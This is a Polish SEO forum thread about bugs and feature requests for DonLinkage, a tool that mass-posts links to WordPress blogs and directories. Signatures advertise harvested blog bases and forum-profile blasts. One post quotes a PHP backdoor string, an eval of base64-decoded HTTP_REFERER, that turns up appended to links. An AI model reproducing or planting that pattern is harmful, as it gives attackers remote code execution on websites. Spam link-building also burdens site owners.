shaun_black 50 Posted September 3, 2014 Jak obecnie wygląda sytuacja z dodawaniem do WP? Najtańsze domeny w Polsce - 13685790121473354021 -3% kod na dowolny serwer wirtualny. Share this post Link to post Share on other sites
Seo tekst 64 Posted September 3, 2014 Działam tylko na swojej sharwestowanej bazie. Na prywatnej bazie wp skuteczność 50% ale może uda się uzyskać więcej. Strony zapleczowe na DARMOWYCH platformach blogowych + linkowanie Strony zapleczowe w technologii html Blast Na 20/25 Lub 40/45 Tysięcy Potwierdzonych Profili Na Forach Share this post Link to post Share on other sites
okazwłoka 1,406 Posted September 4, 2014 W najbliższym czasie dojdzie osługa generatora synonimów http://www.forum.optymalizacja.com/topic/199332-generator-synonimow-online-synonimi4apl/ - będzie sprzężone przez api - przy każdym polu będzie można generować synonimy jednym kliknięciem. Będzie też aktualizacja DonLinkage z tym podglądem i kilka popraweczek. 32 wizytówki nap - 60 zł netto! ---------------------------------------------------- Share this post Link to post Share on other sites
san 27 Posted September 4, 2014 W najbliższym czasie dojdzie osługa generatora synonimów w ramach premium czy regular price? Share this post Link to post Share on other sites
okazwłoka 1,406 Posted September 4, 2014 Regular of korz 32 wizytówki nap - 60 zł netto! ---------------------------------------------------- Share this post Link to post Share on other sites
crossxx 23 Posted September 4, 2014 Gdzie w nowej wersji są informacje o tym ile dany katalog ma błędów, przeszukałem i nie widze Szybki i sprawdzony serwer do GSA, CS czy ZennoPostera - SolidSeoVPS Share this post Link to post Share on other sites
okazwłoka 1,406 Posted September 4, 2014 Trzeba eksportować logi do csv i tam są te ilości podane 1 32 wizytówki nap - 60 zł netto! ---------------------------------------------------- Share this post Link to post Share on other sites
ravau 170 Posted September 4, 2014 w nowej wersji monitor pozycji jest nieczytelny imo Share this post Link to post Share on other sites
okazwłoka 1,406 Posted September 4, 2014 Będzie poprawiony - faktycznie zbyt rozstrzelone to jest. 32 wizytówki nap - 60 zł netto! ---------------------------------------------------- Share this post Link to post Share on other sites
rebuk 3 Posted September 5, 2014 Będzie poprawiony - faktycznie zbyt rozstrzelone to jest. dobrze wiedzieć, bo już sam chciałem się łapać za css Skrobak.pl - moderowany katalog stron PR4 Share this post Link to post Share on other sites
cinmar 180 Posted September 5, 2014 (edited) DLA obecnie dodaje 2x wpis do WP. ( przy 1 projekcie) Generator tekstów ArtMasta nie działa w obecnym DLA. Moja sugestia: - przy tworzeniu projektu w artykułach dodać button generuj treści + dodaj synonimy Edited September 5, 2014 by cinmar Katalog stron, Katalog blogów Share this post Link to post Share on other sites
morelo 2 Posted September 5, 2014 oka prosze cie co z tym Harmonogram zadań u mnie to nadal kupy nie trzyma. Share this post Link to post Share on other sites
okazwłoka 1,406 Posted September 5, 2014 Sprawdzam to, będzie przy aktualizacji mam nadzieję poprawione. @cinmar - wyjaśnij jak chciałbys zeby te przyciski działały 32 wizytówki nap - 60 zł netto! ---------------------------------------------------- Share this post Link to post Share on other sites
cinmar 180 Posted September 5, 2014 Hmm tutaj myslalem wykorzystsać moduł który masz "Automatyczne generowanie tekstów z synonimami!", porpostu klikasz generuj tekst i generuje prosto do projektu bez kopiowania itd, z tym że ustawione sa jakieś limity, może by wykorzystal do tego ArtMasta?. W 1 sofcie byla taka opcja i bardzo dobrze to sie sprawdzało z tym że określane były limity na poszczególne typy formularzy w zależności do czego szedl tekst np do katalogow generował np max 250 znakow, tutaj można by otworzyć okno pomocnicze w określeniu ilości znaków, pomysl do przemyślenia. Katalog stron, Katalog blogów Share this post Link to post Share on other sites
Bestek 9 Posted September 6, 2014 (edited) @ okazwłoka 1. Jeżeli ustawimy np. dodawanie harmonogramu do wordpressów, będziemy dodawać i później usuniemy to zadanie, to czy przy kolejnym ustawieniu dodawania zacznie dodawać od początku czy tam gdzie skończył ostatnio? 2. Czy jeżeli w polu: Ilość ustawię 0 to zadziała to tak jak w MAX, czyli bez ograniczeń? 3. Przy dodawaniu do wordpressów w niektórych linkach w raporcie na końcu mam doklejone: /%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/ Da radę nie doklejać tego kodu? 4. W czasie dodawania w harmonogramie mam podaną wartość W TRAKCIE id: x. Czy mógłbyś wprowadzić również statystykę ile dodało i ile jest wszystkich do dodania czyli np. jak mam 100 katalogów a dodaje aktualnie do 50 to by było 50/100 - wtedy będzie widać jaki jest progres. Podawanie ID nic nie wnosi bo zwykle są to wartości dużo wyższe niż ilość katalogów. 5. Przydałoby się aby w sofcie była jakąś zakładka FAQ i tam wyjaśnienie podstawowych pytań odnośnie softu, np. jakie crony trzeba ustawić, do czego służą i inne podstawowe pytania, które często się pojawiają. Edited September 6, 2014 by Bestek Share this post Link to post Share on other sites